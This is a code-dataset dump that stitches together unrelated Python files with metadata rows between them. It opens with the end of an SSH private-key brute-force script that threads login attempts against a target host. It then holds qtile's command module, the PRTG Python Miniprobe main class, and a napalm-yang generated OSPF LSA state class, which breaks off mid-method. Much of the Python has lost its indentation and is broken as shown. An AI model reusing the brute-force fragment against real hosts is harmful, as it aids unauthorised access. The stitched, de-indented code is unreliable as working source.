connection_lock.acquire()
# Receives the keyfile's location and joins it with the file name for a complete path.
fullpath = os.path.join(keyDir, keyfile)
print("[-] Testing key: {0}".format(str(fullpath)))
# Defines and starts the thread.
        bruteforce = threading.Thread(target=connect, args=(user, tgtHost, fullpath, True))
        bruteforce.start()
if __name__ == '__main__':
main() | gpl-2.0 | -930,355,457,819,945,000 | 30.598131 | 110 | 0.633728 | false |
Fxrh/tispa-wm | libqtile/command.py | 1 | 12105 | # Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import inspect
import traceback
import textwrap
import os
import ipc
class CommandError(Exception):
pass
class CommandException(Exception):
pass
class _SelectError(Exception):
def __init__(self, name, sel):
Exception.__init__(self)
self.name, self.sel = name, sel
SUCCESS = 0
ERROR = 1
EXCEPTION = 2
SOCKBASE = "qtilesocket.%s"
def formatSelector(lst):
"""
Takes a list of (name, sel) tuples, and returns a formatted
selector expression.
"""
expr = []
for i in lst:
if expr:
expr.append(".")
expr.append(i[0])
if i[1] is not None:
expr.append("[%s]" % repr(i[1]))
return "".join(expr)
class _Server(ipc.Server):
def __init__(self, fname, qtile, conf):
if os.path.exists(fname):
os.unlink(fname)
ipc.Server.__init__(self, fname, self.call)
self.qtile = qtile
self.widgets = {}
for i in conf.screens:
for j in i.gaps:
if hasattr(j, "widgets"):
for w in j.widgets:
if w.name:
self.widgets[w.name] = w
def call(self, data):
selectors, name, args, kwargs = data
try:
obj = self.qtile.select(selectors)
except _SelectError, v:
e = formatSelector([(v.name, v.sel)])
s = formatSelector(selectors)
return ERROR, "No object %s in path '%s'" % (e, s)
cmd = obj.command(name)
if not cmd:
return ERROR, "No such command."
self.qtile.log.info("Command: %s(%s, %s)" % (name, args, kwargs))
try:
return SUCCESS, cmd(*args, **kwargs)
except CommandError, v:
return ERROR, v.args[0]
except Exception, v:
return EXCEPTION, traceback.format_exc()
self.qtile.conn.flush()
class _Command:
def __init__(self, call, selectors, name):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.call = call
def __call__(self, *args, **kwargs):
return self.call(self.selectors, self.name, *args, **kwargs)
class _CommandTree(object):
"""
    A CommandTree is a hierarchical collection of command objects.
CommandTree objects act as containers, allowing them to be nested. The
commands themselves appear on the object as callable attributes.
"""
def __init__(self, call, selectors, myselector, parent):
self.call = call
self.selectors = selectors
self.myselector = myselector
self.parent = parent
@property
def path(self):
s = self.selectors[:]
if self.name:
s += [(self.name, self.myselector)]
return formatSelector(s)
def __getitem__(self, select):
if self.myselector:
raise KeyError("No such key: %s" % select)
c = self.__class__(self.call, self.selectors, select, self)
return c
def __getattr__(self, name):
nextSelector = self.selectors[:]
if self.name:
nextSelector.append((self.name, self.myselector))
if name in self._contains:
return _TreeMap[name](self.call, nextSelector, None, self)
else:
return _Command(self.call, nextSelector, name)
class _TLayout(_CommandTree):
name = "layout"
_contains = ["group", "window", "screen"]
class _TWidget(_CommandTree):
name = "widget"
_contains = ["bar", "screen", "group"]
class _TBar(_CommandTree):
name = "bar"
_contains = ["screen"]
class _TWindow(_CommandTree):
name = "window"
_contains = ["group", "screen", "layout"]
class _TScreen(_CommandTree):
name = "screen"
_contains = ["layout", "window", "bar"]
class _TGroup(_CommandTree):
name = "group"
_contains = ["layout", "window", "screen"]
_TreeMap = {
"layout": _TLayout,
"widget": _TWidget,
"bar": _TBar,
"window": _TWindow,
"screen": _TScreen,
"group": _TGroup,
}
class _CommandRoot(_CommandTree):
name = None
_contains = ["layout", "widget", "screen", "bar", "window", "group"]
def __init__(self):
"""
This method constructs the entire hierarchy of callable commands
from a conf object.
"""
_CommandTree.__init__(self, self.call, [], None, None)
def __getitem__(self, select):
raise KeyError("No such key: %s" % select)
def call(self, selectors, name, *args, **kwargs):
"""
This method is called for issued commands.
:selectors A list of (name, selector) tuples.
:name Command name.
"""
pass
def find_sockfile(display=None):
"""
Finds the appropriate socket file.
"""
if not display:
display = os.environ.get("DISPLAY")
if not display:
display = ":0.0"
if '.' not in display:
display += '.0'
cache_directory = os.path.expandvars('$XDG_CACHE_HOME')
if cache_directory == '$XDG_CACHE_HOME':
# if variable wasn't set
cache_directory = os.path.expanduser("~/.cache")
if not os.path.exists(cache_directory):
os.makedirs(cache_directory)
return os.path.join(cache_directory, SOCKBASE % display)
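# With DISPLAY=":0" and XDG_CACHE_HOME unset this resolves to something like
# ~/.cache/qtilesocket.:0.0 -- one socket file per display.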
class Client(_CommandRoot):
"""
Exposes a command tree used to communicate with a running instance of
Qtile.
"""
def __init__(self, fname=None):
if not fname:
fname = find_sockfile()
self.client = ipc.Client(fname)
_CommandRoot.__init__(self)
def call(self, selectors, name, *args, **kwargs):
state, val = self.client.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
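# A rough sketch of driving a running Qtile through Client (assumes a live
# instance and a reachable socket; the group name and the info() command shown
# here are illustrative, not guaranteed by this module):
#   c = Client()
#   c.commands()                   # list the commands exposed by the root object
#   c.group["a"].screen.info()     # walk the object tree, then call a command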
class CommandRoot(_CommandRoot):
def __init__(self, qtile):
self.qtile = qtile
super(CommandRoot, self).__init__()
def call(self, selectors, name, *args, **kwargs):
state, val = self.qtile.server.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class _Call:
def __init__(self, selectors, name, *args, **kwargs):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.args, self.kwargs = args, kwargs
# Conditionals
self.layout = None
def when(self, layout=None):
self.layout = layout
return self
def check(self, q):
if self.layout and q.currentLayout.name != self.layout:
return False
return True
class _LazyTree(_CommandRoot):
def call(self, selectors, name, *args, **kwargs):
return _Call(selectors, name, *args, **kwargs)
lazy = _LazyTree()
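# `lazy` builds deferred calls: attribute access only records the selector path
# and arguments in a _Call object; Qtile resolves and executes it later, when
# the bound key fires (check() gates it on the optional layout condition).
# A minimal sketch of how a config might use it (the Key class comes from the
# config module; the bindings shown are illustrative):
#   Key(["mod4"], "k", lazy.layout.up())
#   Key(["mod4"], "t", lazy.to_screen(0).when(layout="max"))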
class CommandObject(object):
"""
Base class for objects that expose commands. Each command should be a
method named cmd_X, where X is the command name.
"""
def select(self, selectors):
if not selectors:
return self
name, sel = selectors[0]
selectors = selectors[1:]
r = self.items(name)
if (r is None) or\
(r[1] is None and sel is not None) or\
(r[1] is not None and sel and sel not in r[1]) or\
(r[0] is False and sel is None):
raise _SelectError(name, sel)
obj = self._select(name, sel)
if obj is None:
raise _SelectError(name, sel)
return obj.select(selectors)
def items(self, name):
"""
Returns a list of contained items for this name.
"""
ret = self._items(name)
if ret is None:
raise CommandError("Unknown item class: %s" % name)
return ret
def _items(self, name):
"""
Return (root, items) tuple for the specified item class, with:
root: True if this class accepts a "naked" specification
without an item specification (i.e. "layout"), and False if it
does not.
items is a list of contained items, or None if this object is
not a valid container.
Return None if name is not a valid item class.
"""
raise NotImplementedError
    def _select(self, name, sel):
"""
Return a selected object, or None if no such object exists.
This method is called with the following guarantees:
- name is a valid selector class for this item
- sel is a valid selector for this item
- the name, sel tuple is not an "impossible" combination (e.g.
a selector is specified when this is not a containment
object).
"""
raise NotImplementedError
def command(self, name):
return getattr(self, "cmd_" + name, None)
def commands(self):
lst = []
for i in dir(self):
if i.startswith("cmd_"):
lst.append(i[4:])
return lst
def cmd_commands(self):
"""
Returns a list of possible commands for this object.
Used by __qsh__ for command completion and online help.
"""
return self.commands()
def cmd_items(self, name):
"""
Returns a list of contained items for the specified name. Used by
__qsh__ to allow navigation of the object graph.
"""
return self.items(name)
def docSig(self, name):
args, varargs, varkw, defaults = inspect.getargspec(self.command(name))
if args and args[0] == "self":
args = args[1:]
return name + inspect.formatargspec(args, varargs, varkw, defaults)
def docText(self, name):
return textwrap.dedent(self.command(name).__doc__ or "")
def doc(self, name):
spec = self.docSig(name)
htext = self.docText(name)
htext = "\n".join([i for i in htext.splitlines()])
return spec + htext
def cmd_doc(self, name):
"""
Returns the documentation for a specified command name. Used by
__qsh__ to provide online help.
"""
if name in self.commands():
return self.doc(name)
else:
raise CommandError("No such command: %s" % name)
| gpl-3.0 | -735,328,225,687,440,100 | 29.11194 | 79 | 0.581 | false |
PaesslerAG/PythonMiniProbe | miniprobe/miniprobe.py | 1 | 7571 | #!/usr/bin/env python
# Copyright (c) 2014, Paessler AG <[email protected]>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions
# and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
# and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse
# or promote products derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# PRTG Python Miniprobe
# Miniprobe needs at least Python 2.7 because of "importlib"
# If older python version is used you will have to install "importlib"
# import general modules
import sys
import hashlib
import importlib
import gc
import logging
import subprocess
import os
import requests
import warnings
from requests.packages.urllib3 import exceptions
# import own modules
sys.path.append('./')
try:
import sensors
except Exception as e:
print(e)
class MiniProbe(object):
"""
Main class for the Python Mini Probe
"""
def __init__(self, http):
gc.enable()
self.http = http
logging.basicConfig(
filename="./logs/probe.log",
filemode="a",
level=logging.INFO,
format="%(asctime)s - %(levelname)s - %(message)s",
datefmt='%m/%d/%Y %H:%M:%S'
)
def get_import_sensors(self):
"""
import available sensor modules and return list of sensor objects
"""
sensor_objects = []
for mod in sensors.__all__:
try:
sensor_objects.append(self.load_class("sensors.%s.%s" % (mod.lower(), mod)))
except Exception as import_error:
logging.error("Sensor Import Error! Error message: %s" % import_error)
return sensor_objects
@staticmethod
def load_class(full_class_string):
"""
dynamically load a class from a string
"""
class_data = full_class_string.split(".")
module_path = ".".join(class_data[:-1])
class_str = class_data[-1]
module = importlib.import_module(module_path)
return getattr(module, class_str)
def read_config(self, path):
"""
read configuration file and write data to dict
"""
config = {}
try:
conf_file = open(path)
for line in conf_file:
if not (line == '\n'):
if not (line.startswith('#')):
config[line.split(':')[0]] = line.split(':')[1].rstrip()
conf_file.close()
return config
except Exception as read_error:
logging.error("No config found! Error Message: %s Exiting!" % read_error)
sys.exit()
@staticmethod
def hash_access_key(key):
"""
        create hash of the probe's access key
"""
key = key.encode('utf-8')
return hashlib.sha1(key).hexdigest()
def create_parameters(self, config, jsondata, i=None):
"""
create URL parameters for announce, task and data requests
"""
if i == 'announce':
return {'gid': config['gid'], 'key': self.hash_access_key(config['key']), 'protocol': config['protocol'],
'name': config['name'], 'baseinterval': config['baseinterval'], 'sensors': jsondata}
else:
return {'gid': config['gid'], 'key': self.hash_access_key(config['key']), 'protocol': config['protocol']}
def create_url(self, config, i=None, http=False):
"""
creating the actual URL
"""
prefix = "https"
if http:
prefix = "http"
if not (i is None) and (i != "data"):
return "%s://%s:%s/probe/%s" % (
prefix, config['server'], config['port'], i)
elif i == "data":
return "%s://%s:%s/probe/%s?gid=%s&protocol=%s&key=%s" % (prefix, config['server'], config['port'], i,
config['gid'], config['protocol'],
self.hash_access_key(config['key']))
pass
else:
return "No method given"
def build_announce(self, sensor_list):
"""
build json for announce request
"""
sensors_avail = []
for sensor in sensor_list:
if not sensor.get_sensordef() == "":
sensors_avail.append(sensor.get_sensordef())
return sensors_avail
def build_task(self, config):
"""
build data payload for task request.
"""
task = {
'gid': config['gid'],
'protocol': config['protocol'],
'key': self.hash_access_key(config['key'])
}
return task
def request_to_core(self, req_type, data, config):
"""
perform different request types to the core
"""
url = self.create_url(config, req_type, self.http)
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore", exceptions.InsecureRequestWarning)
request_to_core = requests.post(url, data=data, verify=False, timeout=30)
logging.info("%s request successfully sent to PRTG Core Server at %s:%s."
% (req_type, config["server"], config["port"]))
logging.debug("Connecting to %s:%s" % (config["server"], config["port"]))
logging.debug("Status Code: %s | Message: %s" % (request_to_core.status_code, request_to_core.text))
return request_to_core
except requests.exceptions.Timeout:
logging.error("%s Timeout: %s" % (req_type, str(data)))
raise
except Exception as req_except:
logging.error("Exception %s!" % req_except)
raise
def split_json_response(self, json_response, size=None):
"""
split up response from task request into predefined chunk sizes
"""
if not size:
size = "10"
return [json_response[i:i + int(size)] for i in range(0, len(json_response), int(size))]
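    # For example (illustrative): split_json_response(list(range(7)), 3) yields
    # [[0, 1, 2], [3, 4, 5], [6]] -- results go back to the core in chunks of
    # at most `size` entries.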
@staticmethod
def clean_mem():
"""Ugly brute force method to clean up Mem"""
subprocess.call("sync", shell=False)
os.popen("sysctl vm.drop_caches=1")
os.popen("sysctl vm.drop_caches=2")
os.popen("sysctl vm.drop_caches=3")
| bsd-3-clause | -7,684,119,281,292,025,000 | 37.431472 | 119 | 0.59226 | false |
napalm-automation/napalm-yang | napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/__init__.py | 1 | 49119 | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters for the AS external LSA
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__mask",
"__metric_type",
"__metric",
"__forwarding_address",
"__external_route_tag",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
"state",
]
def _get_mask(self):
"""
Getter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
YANG Description: The subnet mask for the advertised destination
"""
return self.__mask
def _set_mask(self, v, load=False):
"""
Setter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mask() directly.
YANG Description: The subnet mask for the advertised destination
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mask must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..32']}), is_leaf=True, yang_name="mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__mask = t
if hasattr(self, "_set"):
self._set()
def _unset_mask(self):
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
YANG Description: The type of metric included within the AS External LSA.
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric included within the AS External LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'TYPE_1': {}, 'TYPE_2': {}},), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
def _get_forwarding_address(self):
"""
Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
return self.__forwarding_address
def _set_forwarding_address(self, v, load=False):
"""
Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding_address() directly.
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""",
"defined-type": "inet:ipv4-address-no-zone",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
}
)
self.__forwarding_address = t
if hasattr(self, "_set"):
self._set()
def _unset_forwarding_address(self):
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
def _get_external_route_tag(self):
"""
Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
        YANG Description: An opaque tag that is set by the LSA originator to carry
information relating to the external route
"""
return self.__external_route_tag
def _set_external_route_tag(self, v, load=False):
"""
Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
